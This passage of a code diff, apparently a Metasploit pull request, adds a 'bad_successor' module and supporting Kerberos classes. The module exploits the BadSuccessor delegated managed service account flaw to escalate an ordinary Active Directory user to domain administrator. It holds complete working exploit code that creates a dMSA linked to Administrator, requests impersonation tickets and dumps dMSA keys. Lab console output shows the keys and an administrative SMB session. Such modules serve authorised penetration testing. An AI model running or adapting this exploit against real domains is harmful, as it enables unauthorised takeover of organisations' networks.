+                self.user_id = S4uUserId.decode(val.value[0])
+              when 1
+                self.checksum = Checksum.new.decode(val.value[0])
+              else
+                raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode PA-S4U-X509-USER SEQUENCE'
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/rex/proto/kerberos/model/s4u_user_id.rb
+++ b/lib/rex/proto/kerberos/model/s4u_user_id.rb
@@ -1,0 +1,161 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class provides a representation of the S4UUserID structure
+        # as defined in the Kerberos protocol.
+        class S4uUserId < Element
+          # @!attribute nonce
+          #   @return [Integer] The nonce in KDC-REQ-BODY
+          attr_accessor :nonce
+          # @!attribute cname
+          #   @return [Rex::Proto::Kerberos::Model::PrincipalName, nil] The principal name (optional)
+          attr_accessor :cname
+          # @!attribute crealm
+          #   @return [String] The realm
+          attr_accessor :crealm
+          # @!attribute subject_certificate
+          #   @return [String, nil] The subject certificate (optional)
+          attr_accessor :subject_certificate
+          # @!attribute options
+          #   @return [String, nil] The options (optional)
+          attr_accessor :options
+
+          ##
+          #     //S4UUserID::= SEQUENCE {
+          #     //    nonce[0] UInt32, --the nonce in KDC - REQ - BODY
+          #     //    cname[1] PrincipalName OPTIONAL,
+          #     //    --Certificate mapping hints
+          #     //    crealm[2] Realm,
+          #     //    subject-certificate[3] OCTET STRING OPTIONAL,
+          #     //    options[4] BIT STRING OPTIONAL,
+          #     //    ...
+          #     //}
+
+
+          def initialize(name, impersonate_type, realm, nonce)
+            self.nonce = nonce
+            # Set cname name_type based on dMSA flag
+            self.cname = Rex::Proto::Kerberos::Model::PrincipalName.new(
+              name_type: impersonate_type == 'dmsa' ? NameType::NT_PRINCIPAL : NameType::NT_ENTERPRISE,
+              name_string: [name]
+            )
+            self.crealm = realm
+
+            # Default options
+            self.options = impersonate_type == 'dmsa' ? ::Rex::Proto::Kerberos::Model::PaS4uX509UserOptions::UNCONDITIONAL_DELEGATION | ::Rex::Proto::Kerberos::Model::PaS4uX509UserOptions::SIGN_REPLY : ::Rex::Proto::Kerberos::Model::PaS4uX509UserOptions::SIGN_REPLY
+          end
+
+          # Decodes the S4UUserID from an input
+          #
+          # @param input [String, OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [self] if decoding succeeds
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::ASN1Data
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode S4UUserID, invalid input'
+            end
+
+            self
+          end
+
+          # Encodes the S4UUserID into an ASN.1 String
+          #
+          # @return [String]
+          def encode
+            elems = []
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_nonce], 0, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_cname], 1, :CONTEXT_SPECIFIC) if cname
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_crealm], 2, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_subject_certificate], 3, :CONTEXT_SPECIFIC) if subject_certificate
+            # Convert options to a byte array
+            options_bytes = [self.options].pack('N') # Pack as a big-endian unsigned 32-bit integer
+            elems << OpenSSL::ASN1::ASN1Data.new([OpenSSL::ASN1::BitString.new(options_bytes)], 4, :CONTEXT_SPECIFIC)
+
+
+            seq = OpenSSL::ASN1::Sequence.new(elems)
+
+            seq.to_der
+          end
+
+          private
+
+          # Encodes the nonce attribute
+          #
+          # @return [OpenSSL::ASN1::Integer]
+          def encode_nonce
+            OpenSSL::ASN1::Integer.new(nonce)
+          end
+
+          # Encodes the cname attribute
+          #
+          # @return [String]
+          def encode_cname
+            cname.encode
+          end
+
+          # Encodes the crealm attribute
+          #
+          # @return [OpenSSL::ASN1::GeneralString]
+          def encode_crealm
+            OpenSSL::ASN1::GeneralString.new(crealm)
+          end
+
+          # Encodes the subject_certificate attribute
+          #
+          # @return [OpenSSL::ASN1::OctetString]
+          def encode_subject_certificate
+            OpenSSL::ASN1::OctetString.new(subject_certificate)
+          end
+
+          # Encodes the options attribute
+          #
+          # @return [OpenSSL::ASN1::BitString]
+          def encode_options
+            OpenSSL::ASN1::BitString.new(options)
+          end
+
+          # Decodes the S4UUserID from a String
+          #
+          # @param input [String] the input to decode from
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+
+            decode_asn1(asn1)
+          end
+
+          # Decodes the S4UUserID from an OpenSSL::ASN1::Sequence
+          #
+          # @param input [OpenSSL::ASN1::Sequence] the input to decode from
+          def decode_asn1(input)
+            seq_values = input.value
+
+            seq_values.each do |val|
+              case val.tag
+              when 0
+                self.nonce = val.value[0].value.to_i
+              when 1
+                self.cname = Rex::Proto::Kerberos::Model::PrincipalName.decode(val.value[0])
+              when 2
+                self.crealm = val.value[0].value
+              when 3
+                self.subject_certificate = val.value[0].value
+              when 4
+                self.options = val.value[0].value
+              else
+                raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode S4UUserID SEQUENCE'
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/admin/kerberos/get_ticket.rb
+++ b/modules/auxiliary/admin/kerberos/get_ticket.rb
@@ -50,6 +50,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('PASSWORD', [ false, 'The domain user\'s password' ]),
         OptPath.new('CERT_FILE', [ false, 'The PKCS12 (.pfx) certificate file to authenticate with' ]),
         OptString.new('CERT_PASSWORD', [ false, 'The certificate file\'s password' ]),
+        OptEnum.new('IMPERSONATE_TYPE', [true, 'The impersonation type to use when requesting a TGS', 'none', ['auto', 'generic', 'none', 'dmsa'], 'none']),
         OptString.new(
           'NTHASH', [
             false,
@@ -204,7 +205,43 @@ class MetasploitModule < Msf::Auxiliary
     end
     credential = authenticator.request_tgt_only(tgt_request_options)
 
-    if datastore['IMPERSONATE'].present?
+    if datastore['IMPERSONATE_TYPE'] == 'dmsa'
+      print_status("#{peer} - Getting TGS impersonating #{datastore['IMPERSONATE']}@#{@realm} (SPN: #{datastore['SPN']})")
+
+      sname = Rex::Proto::Kerberos::Model::PrincipalName.new(
+        name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+        name_string: [
+          'krbtgt',
+          @realm
+        ]
+      )
+
+      nonce = rand(0..0x7FFFFFFF)
+      auth_options = {
+        sname: sname,
+        nonce: nonce,
+        impersonate: datastore['IMPERSONATE'],
+        impersonate_type: datastore['IMPERSONATE_TYPE']
+      }
+      tgs_ticket, tgs_auth, tgs_credential = authenticator.s4u2self(
+        credential,
+        auth_options.merge(ticket_storage: kerberos_ticket_storage(read: false, write: true))
+      )
+
+      tgs_auth.pa_data.each do |pa_data|
+        if pa_data.type == Rex::Proto::Kerberos::Model::PreAuthType::DMSA_KEY_PACKAGE
+          dmsa_key_package = Rex::Proto::Kerberos::Model::DmsaKeyPackage.decode(pa_data.value)
+          print_dmsa_key_package_info(dmsa_key_package)
+        end
+      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError => e
+        print_error("#{peer} - Failed to decode dMSA Key Package: #{e.message}")
+        next
+      end
+
+      auth_options[:tgs_ticket] = tgs_ticket
+      auth_options[:credential] = tgs_credential
+      auth_options
+    elsif datastore['IMPERSONATE_TYPE'] == 'generic'
       print_status("#{peer} - Getting TGS impersonating #{datastore['IMPERSONATE']}@#{@realm} (SPN: #{datastore['SPN']})")
 
       sname = Rex::Proto::Kerberos::Model::PrincipalName.new(
@@ -233,12 +270,36 @@ class MetasploitModule < Msf::Auxiliary
         name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
         name_string: datastore['SPN'].split('/')
       )
+      nonce = rand(0..0x7FFFFFFF) # nonce should be a signed 32-bit integer
       tgs_options = {
         sname: sname,
+        nonce: nonce,
         ticket_storage: kerberos_ticket_storage(read: false)
       }
 
       authenticator.request_tgs_only(credential, tgs_options)
+    end
+  end
+
+  def print_dmsa_key_package_info(dmsa_key_package)
+    print_status('dMSA Key Package:')
+
+    print_status('  Current Keys:')
+    dmsa_key_package.current_keys.each do |key_set|
+      key_set.each do |key|
+        type = Rex::Proto::Kerberos::Crypto::Encryption::IANA_NAMES[key[0][0]] || 'unknown'
+        value = key[1][0]
+        print_good("    Type: #{type}, Key: #{value.unpack1('H*')}")
+      end
+    end
+
+    print_status('  Previous Keys:')
+    dmsa_key_package.previous_keys.each do |key_set|
+      key_set.each do |key|
+        type = Rex::Proto::Kerberos::Crypto::Encryption::IANA_NAMES[key[0][0]] || 'unknown'
+        value = key[1][0]
+        print_good("    Type: #{type}, Key: #{value.unpack1('H*')}")
+      end
     end
   end
 

--- a/modules/auxiliary/admin/ldap/bad_successor.rb
+++ b/modules/auxiliary/admin/ldap/bad_successor.rb
@@ -1,0 +1,389 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::LDAP
+  include Rex::Proto::LDAP
+  include Msf::OptionalSession::LDAP
+  include Msf::Exploit::Remote::LDAP::ActiveDirectory
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory',
+        'Description' => %q{
+          This module exploits 'Bad Successor', which allows operators to elevate privileges on domain controllers
+          running at the Windows 2025 forest functional level. Microsoft decided to introduce Delegated Managed Service
+          Accounts in this forest level and they came ripe for exploitation.
+
+          Normal users can't create dMSA accounts where dMSA accounts are supposed to be created, the Managed Service
+          Accounts OU, but if a normal user has write access to any other OU they can then create a dMSA account in
+          said OU. After creating the account the user can edit LDAP attributes of the account to indicate that this
+          account should inherit privileges from the Administrator user. Once this is complete we can request kerberos
+          tickets on behalf of the dMSA account and voilà, you're admin.
+
+          The module has two actions, one for creating the dMSA account and setting it up to impersonate a high
+          privilege user, and another action for requesting the kerberos tickets needed to use the dMSA account for privilege
+          escalation.
+        },
+        'Author' => [
+          'AngelBoy', # discovery
+          'Spencer McIntyre', # Help with the Kerberos Bits
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory?&vid=badsuccessor-demo-video'],
+          [ 'URL', 'https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/'],
+          [ 'URL', 'https://jorgequestforknowledge.wordpress.com/2025/09/02/from-badsuccessor-to-patchedsuccessor/'],
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => true,
+        'DisclosureDate' => '2025-05-21',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'AKA' => [ 'BadSuccessor' ]
+        },
+        'Actions' => [
+          [ 'CREATE_DMSA', { 'Description' => 'Create a dMSA account which impersonates a high privilege user' } ],
+          [ 'GET_TICKET', { 'Description' => 'Requests a series of tickets to give the user a ticket which can be used in the context of whomst the dMSA account impersonates' } ],
+        ],
+        'DefaultAction' => 'CREATE_DMSA'
+      )
+    )
+    register_options([
+      OptString.new('DMSA_ACCOUNT_NAME', [true, 'The name of the dMSA account to be create or request tickets for']),
+      OptString.new('ACCOUNT_TO_IMPERSONATE', [true, 'The name of the dMSA account to be created', 'Administrator'], conditions: %w[ACTION == CREATE_DMSA]),
+      OptString.new('RHOSTNAME', [true, 'The hostname of the domain controller'], conditions: %w[ACTION == GET_TICKET]),
+      OptString.new('SERVICE', [true, 'The Service you wish to get a high privilege ticket for', 'cifs'], conditions: %w[ACTION == GET_TICKET]),
+    ])
+    deregister_options('SESSION')
+  end
+
+  def windows_version_vulnerable?
+    domain_info = adds_get_domain_info(@ldap)
+    version = domain_info[:domain_behavior_version]
+
+    unless version.to_i == 10
+      print_error('This module only works against domains running at the Windows 2025 functional level.')
+      return false
+    end
+    print_good('The domain is running at the Windows 2025 functional level, which is vulnerable to BadSuccessor.')
+    true
+  end
+
+  def check
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+
+      if (@base_dn = datastore['BASE_DN'])
+        print_status("User-specified base DN: #{@base_dn}")
+      else
+        print_status('Discovering base DN automatically')
+
+        unless (@base_dn = ldap.base_dn)
+          print_warning("Couldn't discover base DN!")
+        end
+      end
+      @ldap = ldap
+
+      return Exploit::CheckCode::Safe unless windows_version_vulnerable?
+
+      ous = get_ous_we_can_write_to
+      if ous.blank?
+        return Exploit::CheckCode::Safe("Failed to find any Organizational Units #{datastore['LDAPUsername']} can write to.")
+      end
+
+      print_good("Found #{ous.length} OUs we can write to, listing below:")
+      ous.each do |ou|
+        print_good(" - #{ou}")
+      end
+
+      Exploit::CheckCode::Appears
+    end
+  rescue Errno::ECONNRESET
+    return Exploit::CheckCode::Unknown('The connection was reset')
+  rescue Rex::ConnectionError, Net::LDAP::Error => e
+    return Exploit::CheckCode::Unknown(e.message)
+  end
+
+  def get_ous_we_can_write_to
+    organizational_units = []
+
+    filter = '(objectClass=organizationalUnit)'
+    attributes = ['distinguishedName', 'name', 'objectClass', 'nTSecurityDescriptor']
+    entries = query_ldap_server(filter, attributes)
+    entries.each do |entry|
+      if adds_obj_grants_permissions?(@ldap, entry, SecurityDescriptorMatcher::Allow.any(%i[WP]))
+        organizational_units << entry[:dn].first
+      end
+    end
+    organizational_units
+  end
+
+  def query_ldap_server(raw_filter, attributes, base_prefix: nil)
+    if base_prefix.blank?
+      full_base_dn = @base_dn.to_s
+    else
+      full_base_dn = "#{base_prefix},#{@base_dn}"
+    end
+    begin
+      filter = Net::LDAP::Filter.construct(raw_filter)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Could not compile the filter! Error was #{e}")
+    end
+
+    # Set the value of LDAP_SERVER_SD_FLAGS_OID flag so everything but
+    # the SACL flag is set, as we need administrative privileges to retrieve
+    # the SACL from the ntSecurityDescriptor attribute on Windows AD LDAP servers.
+
+    all_but_sacl_flag = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION
+    control_values = [all_but_sacl_flag].map(&:to_ber).to_ber_sequence.to_s.to_ber
+    controls = []
+    controls << [LDAP_SERVER_SD_FLAGS_OID.to_ber, true.to_ber, control_values].to_ber_sequence
+    returned_entries = @ldap.search(base: full_base_dn, filter: filter, attributes: attributes, controls: controls)
+    query_result_table = @ldap.get_operation_result.table
+    validate_query_result!(query_result_table, filter)
+    returned_entries
+  end
+
+  def create_dmsa(account_name, writeable_dn, group_membership)
+    sam_account_name = account_name + '$' unless account_name.ends_with?('$')
+    dn = "CN=#{account_name},#{writeable_dn}"
+    print_status("Attempting to create dmsa account cn: #{account_name}, dn: #{dn}")
+
+    dmsa_attributes = {
+      'objectclass' => ['top', 'person', 'organizationalPerson', 'user', 'computer', 'msDS-DelegatedManagedServiceAccount'],
+      'cn' => [account_name],
+      'useraccountcontrol' => ['4096'],
+      'samaccountname' => [sam_account_name],
+      'dnshostname' => ["#{Faker::Name.first_name}.#{datastore['LDAPDomain']}"],
+      'msds-supportedencryptiontypes' => ['28'],
+      'msds-managedpasswordinterval' => ['30'],
+      'msds-groupmsamembership' => [group_membership],
+      'msds-delegatedmsastate' => ['0'],
+      'name' => [account_name]
+    }
+
+    unless @ldap.add(dn: dn, attributes: dmsa_attributes)
+
+      res = @ldap.get_operation_result
+
+      case res.code
+      when Net::LDAP::ResultCodeInsufficientAccessRights
+        fail_with(Failure::BadConfig, 'Insufficient access to create dMSA seed')
+      when Net::LDAP::ResultCodeEntryAlreadyExists
+        fail_with(Failure::BadConfig, "Seed object #{account_name} already exists")
+      when Net::LDAP::ResultCodeConstraintViolation
+        fail_with(Failure::UnexpectedReply, "Constraint violation: #{res.error_message}")
+      else
+        fail_with(Failure::UnexpectedReply, "#{res.message}: #{res.error_message}")
+      end
+
+      return false
+    end
+
+    print_good("Created dMSA #{account_name}")
+    true
+  end
+
+  def set_dmsa_attributes(dn, delegated_state, preceded_by_link)
+    print_status("Setting attributes for dMSA object: #{dn}")
+
+    # Define the attributes to update
+    operations = [
+      [:replace, 'msds-delegatedmsastate', [delegated_state]],
+      [:replace, 'msds-managedaccountprecededbylink', [preceded_by_link]]
+    ]
+
+    # Perform the LDAP modify operation
+    unless @ldap.modify(dn: dn, operations: operations)
+      res = @ldap.get_operation_result
+      fail_with(Failure::Unknown, "Failed to update attributes for #{dn}: #{res.message} - #{res.error_message}")
+    end
+
+    print_good("Successfully updated attributes for dMSA object: #{dn}")
+  end
+
+  def query_account(account_name)
+    account_name = datastore['DMSA_ACCOUNT_NAME'] + '$' unless datastore['DMSA_ACCOUNT_NAME'].ends_with?('$')
+    entry = adds_get_object_by_samaccountname(@ldap, account_name)
+
+    if entry.nil?
+      print_error('Original object not found')
+      exit
+    end
+
+    attrs_to_copy = {}
+    entry.each do |attr, values|
+      next unless %w[msds-managedaccountprecededbylink msds-delegatedmsastate].include?(attr.to_s)
+
+      attrs_to_copy[attr.to_s] = values.map(&:to_s)
+    end
+
+    attrs_to_copy.each do |key, value|
+      if value.is_a?(Array)
+        if value.length == 1
+          print_status("#{key} => #{value.first.inspect}")
+        else
+          print_status("#{key} => [#{value.map(&:inspect).join(', ')}]")
+        end
+      end
+    end
+  end
+
+  def get_group_memebership(sid)
+    sd = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.from_sddl_text(
+      "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;#{sid})",
+      domain_sid: sid.rpartition('-').first
+    )
+    sd
+  end
+
+  def action_create_dmsa
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+      if (@base_dn = datastore['BASE_DN'])
+        print_status("User-specified base DN: #{@base_dn}")
+      else
+        print_status('Discovering base DN automatically')
+
+        unless (@base_dn = ldap.base_dn)
+          fail_with(Failure::NotFound, "Couldn't discover base DN!")
+        end
+      end
+
+      @ldap = ldap
+      currrent_user_info = adds_get_object_by_samaccountname(ldap, datastore['LDAPUsername'])
+      sid = Rex::Proto::MsDtyp::MsDtypSid.read(currrent_user_info[:objectsid].first)
+
+      # Get vulnerable OUs
+      ous = get_ous_we_can_write_to
+      print_good("Found #{ous.length} OUs we can write to, listing them below:")
+      ous.each do |ou|
+        print_good(" - #{ou}")
+      end
+
+      writeable_dn = ous.sample
+
+      create_dmsa(datastore['DMSA_ACCOUNT_NAME'], writeable_dn, get_group_memebership(sid).to_binary_s)
+      fail_with(Failure::NoTarget, 'There are no Organization Units we can write to, the exploit can not continue') if ous.empty?
+      set_dmsa_attributes("CN=#{datastore['DMSA_ACCOUNT_NAME']},#{writeable_dn}", '2', "CN=#{datastore['ACCOUNT_TO_IMPERSONATE']},CN=Users,#{@base_dn}")
+      query_account(datastore['DMSA_ACCOUNT_NAME'])
+    end
+  end
+
+  def run_get_ticket_module(mod, opts = {})
+    opts.each do |key, value|
+      option_name = key.to_s
+
+      if value == :unset
+        mod.datastore.unset(option_name)
+      else
+        mod.datastore[option_name] = value
+      end
+    end
+
+    result = mod.run_simple(
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output
+    )
+
+    # Exceptions raised in the get_ticket won't propagate here, so fail if the credential is nil
+    fail_with(Failure::Unknown, 'Failed to run get_ticket module.') unless result
+
+    result[:credential]
+  end
+
+  def action_get_ticket
+    mod_refname = 'admin/kerberos/get_ticket'
+
+    print_status("Loading #{mod_refname}")
+    get_ticket_module = framework.modules.create(mod_refname)
+
+    unless get_ticket_module
+      print_error("Failed to load module: #{mod_refname}")
+      return
+    end
+
+    # First get a TGT for the attacker who created the dmsa account:
+    user_tgt = auth_via_kdc
+    print_good("Obtained TGT for the user #{datastore['LDAPUsername']}")
+
+    # Secondly get a TGT for dMSA impersonating the target account:
+    impersonate = datastore['DMSA_ACCOUNT_NAME']
+    impersonate += '$' unless impersonate.ends_with?('$')
+    get_dmsa_tgs_options = {
+      'DOMAIN' => datastore['LDAPDomain'],
+      'PASSWORD' => datastore['LDAPPassword'],
+      'rhosts' => datastore['RHOST'],
+      'username' => datastore['LDAPUsername'],
+      'SPN' => "krbtgt/#{datastore['LDAPDomain']}",
+      'action' => 'get_tgs',
+      'IMPERSONATE' => impersonate,
+      'IMPERSONATE_TYPE' => 'dmsa',
+      'krb5ccname' => user_tgt[:path]
+    }
+
+    dmsa_credential = run_get_ticket_module(get_ticket_module, get_dmsa_tgs_options)
+    print_good("Obtained TGT for dMSA #{datastore['DMSA_ACCOUNT_NAME']}")
+
+    temp_ccache_file = Tempfile.create(['bad_successor_', '.ccache'], binmode: true)
+    begin
+      temp_ccache_file.write(dmsa_credential.to_ccache.encode)
+      temp_ccache_file.close
+
+      # Lastly request the ticket for the desired service:
+      get_priv_esc_tgs_options = {
+        'username' => impersonate,
+        'SPN' => "#{datastore['SERVICE']}/#{datastore['RHOSTNAME']}.#{datastore['LDAPDomain']}",
+        'action' => 'get_tgs',
+        'krb5ccname' => temp_ccache_file.path,
+        'PASSWORD' => :unset,
+        'IMPERSONATE' => :unset,
+        'IMPERSONATE_TYPE' => 'none'
+      }
+
+      run_get_ticket_module(get_ticket_module, get_priv_esc_tgs_options)
+    ensure
+      File.unlink(temp_ccache_file.path) if temp_ccache_file && File.exist?(temp_ccache_file.path)
+    end
+
+    print_good("Obtained elevated TGT for #{datastore['DMSA_ACCOUNT_NAME']}")
+  end
+
+  def init_authenticator(options = {})
+    options.merge!({
+      host: rhost,
+      realm: datastore['LDAPDomain'],
+      username: datastore['LDAPUsername'],
+      password: datastore['LDAPPassword'],
+      framework: framework,
+      framework_module: self
+    })
+
+    Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(**options)
+  end
+
+  def auth_via_kdc
+    authenticator = init_authenticator({ ticket_storage: kerberos_ticket_storage(read: false, write: true) })
+    authenticator.authenticate_via_kdc(options)
+  end
+
+  def run
+    send("action_#{action.name.downcase}")
+  rescue Errno::ECONNRESET
+    fail_with(Failure::Disconnected, 'The connection was reset.')
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+    fail_with(Failure::NoAccess, e.message)
+  rescue Net::LDAP::Error => e
+    fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
+  end
+end


### PR DESCRIPTION
This adds a new module which exploits "Bad Successor", which allows operators to elevate privileges on domain controllers running at the Windows 2025 forest functional level. Microsoft decided to introduce Delegated Managed Service Accounts in this forest level and they came ripe for exploitation. 

Normal users can't create dMSA accounts where dMSA accounts are suppoed to be created, the Managed Service Accounts OU,  _but_ if a normal user has write access to any other OU they can then create a dMSA account in said OU. After creating the account the user can edit LDAP attributes of the account to indicate that this account should inherit privileges from the Administrator user. Once this is complete we can request kerberos tickets on behalf of the dMSA account and voilà, you're admin. 

## Action: CREATE_DMSA
 `CREATE_DMSA` creates a dMSA account and configure it to be vulnerable to Bad Successor.

When the account is created the `msds-groupmsamembership` attribute is set to an nt security descriptor which allows the user the operator is authenticated with, to retrieve the password of the dMSA account. 

After the account is created two attributes on the dMSA are updated: `msds-managedaccountprecededbylink` is set to the DN of the account you wish to impersonate and `msds-delegatedmsastate` is set to `2` which indicates the dMSA account migration is complete. It is necessary to first create the account and then afterwards update these attributes. 

## Action: GET_TICKET
`GET_TICKET` gets a TGT of the user that created the dMSA and has access to retrieve it's password. Then requests a TGT on behalf of the dMSA account with the previous TGT. Then using that TGT requests a TGS for a specific service (defaults to cifs) on the domain controller 

This PR make changes to the `get_ticket` module and then subsequent libraries it calls in order impersonate the dMSA account and also dump the `DMSA_KEY_PACKAGE` ([more here](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/87f5f362-e53c-4949-9a6c-bc9184054517)) during the authentication process.


# Testing 

### Check Method
```
msf auxiliary(admin/ldap/bad_successor) > set DC_FQDN dc5.msf.test
DC_FQDN => dc5.msf.test
msf auxiliary(admin/ldap/bad_successor) > set DMSA_ACCOUNT_NAME attacker_dMSA
DMSA_ACCOUNT_NAME => attacker_dMSA
msf auxiliary(admin/ldap/bad_successor) > set LDAPDomain msf.test
LDAPDomain => msf.test
msf auxiliary(admin/ldap/bad_successor) > set LDAPPassword N0tpassword!
LDAPPassword => N0tpassword!
smsf auxiliary(admin/ldap/bad_successor) > set LDAPUsername msfuser
LDAPUsername => msfuser
msf auxiliary(admin/ldap/bad_successor) > set rhost 172.16.199.209
rhost => 172.16.199.209
msf auxiliary(admin/ldap/bad_successor) > check
[*] Discovering base DN automatically
[+] The domain is running at the Windows 2025 functional level, which is vulnerable to BadSuccessor.
[+] Found 3 OUs we can write to, listing below:
[+]  - OU=Domain Controllers,DC=msf,DC=test
[+]  - OU=BadBois,DC=msf,DC=test
[+]  - OU=dMSA_Accounts,DC=msf,DC=test
[*] 172.16.199.209:389 - The target appears to be vulnerable.
```

### Create dMSA
```
msf auxiliary(admin/ldap/bad_successor) > run
[*] Discovering base DN automatically
[+] Found 3 OUs we can write to, listing them below:
[+]  - OU=Domain Controllers,DC=msf,DC=test
[+]  - OU=BadBois,DC=msf,DC=test
[+]  - OU=dMSA_Accounts,DC=msf,DC=test
[*] Attempting to create dmsa account cn: attacker_dMSA, dn: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
[+] Created dmsa attacker_dMSA
[*] Setting attributes for dMSA object: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
[+] Successfully updated attributes for dMSA object: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
[*] msds-delegatedmsastate => ["2"]
[*] msds-managedaccountprecededbylink => ["CN=Administrator,CN=Users,DC=msf,DC=test"]
[*] Auxiliary module execution completed
```

### Get Ticket 
```
msf auxiliary(admin/ldap/bad_successor) > run
[*] Running module against 172.16.199.209
[*] Loading admin/kerberos/get_ticket
[*] 172.16.199.209:88 - Getting TGT for msfuser@msf.test
[+] 172.16.199.209:88 - Received a valid TGT-Response
[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215739_default_172.16.199.209_mit.kerberos.cca_626542.bin
[+] Obtained TGT for the user msfuser
[*] Using cached credential for krbtgt/MSF.TEST@MSF.TEST msfuser@MSF.TEST
[*] 172.16.199.209:88 - Getting TGS impersonating attacker_dMSA$@msf.test (SPN: krbtgt/msf.test)
[+] 172.16.199.209:88 - Received a valid TGS-Response
[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215741_default_172.16.199.209_mit.kerberos.cca_263687.bin
[*] dMSA Key Package:
[*]   Current Keys:
[+]     Type: AES256, Key: c1085cb36ef8c1e7d62693ba4e3402523c8a4c300591ac2fdd1643d0cd80e6ad
[+]     Type: AES128, Key: ce576bbe6386f5aaee691192ecf0684a
[+]     Type: RC4, Key: 9857452d6e592835e9b4ef337c1be5c8
[*]   Previous Keys:
[+]     Type: RC4, Key: 4fd408d8f8ecb20d4b0768a0ac44b71f
[+] Obtained TGT for dMSA attacker_dMSA
[*] Using cached credential for krbtgt/MSF.TEST@MSF.TEST attacker_dMSA$@msf.test
[*] 172.16.199.209:88 - Getting TGS for attacker_dMSA$@msf.test (SPN: cifs/dc5.msf.test)
[+] 172.16.199.209:88 - Received a valid TGS-Response
[*] 172.16.199.209:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
[+] 172.16.199.209:88 - Received a valid delegation TGS-Response
[+] Obtained elevated TGT for attacker_dMSA
[*] Auxiliary module execution completed
```

### Use ticket to connect to ADMIN$ share
```
msf auxiliary(scanner/smb/smb_login) > set username attacker_dMSA$
username => attacker_dMSA$
msf auxiliary(scanner/smb/smb_login) > set rhost 172.16.199.209
rhost => 172.16.199.209
msf auxiliary(scanner/smb/smb_login) > set domaincontrollerrhost 172.16.199.209
domaincontrollerrhost => 172.16.199.209
msf auxiliary(scanner/smb/smb_login) > set SMB::Rhostname dc5.msf.test
SMB::Rhostname => dc5.msf.test
msf auxiliary(scanner/smb/smb_login) > set SMB::Auth kerberos
SMB::Auth => kerberos
msf auxiliary(scanner/smb/smb_login) > set SMB::Krb5Ccname
SMB::Krb5Ccname =>
msf auxiliary(scanner/smb/smb_login) > set SMB::Krb5Ccname /home/msfuser/.msf4/loot/20251119221707_default_172.16.199.209_mit.kerberos.cca_895184.bin
SMB::Krb5Ccname => /home/msfuser/.msf4/loot/20251119221707_default_172.16.199.209_mit.kerberos.cca_895184.bin
msf auxiliary(scanner/smb/smb_login) > run
[*] 172.16.199.209:445    - 172.16.199.209:445 - Starting SMB login bruteforce
[*] 172.16.199.209:445    - Loaded a credential from ticket file: /home/msfuser/.msf4/loot/20251119221707_default_172.16.199.209_mit.kerberos.cca_895184.bin
[+] 172.16.199.209:445    - 172.16.199.209:445 - Success: 'msf.test\attacker_dMSA$:' Administrator
[*] SMB session 3 opened (172.16.199.1:33643 -> 172.16.199.209:445) at 2025-11-19 22:23:14 -0800
[*] 172.16.199.209:445    - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.199.209:445    - Bruteforce completed, 1 credential was successful.
[*] 172.16.199.209:445    - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions -i

Active sessions
===============

  Id  Name  Type  Information                              Connection
  --  ----  ----  -----------                              ----------
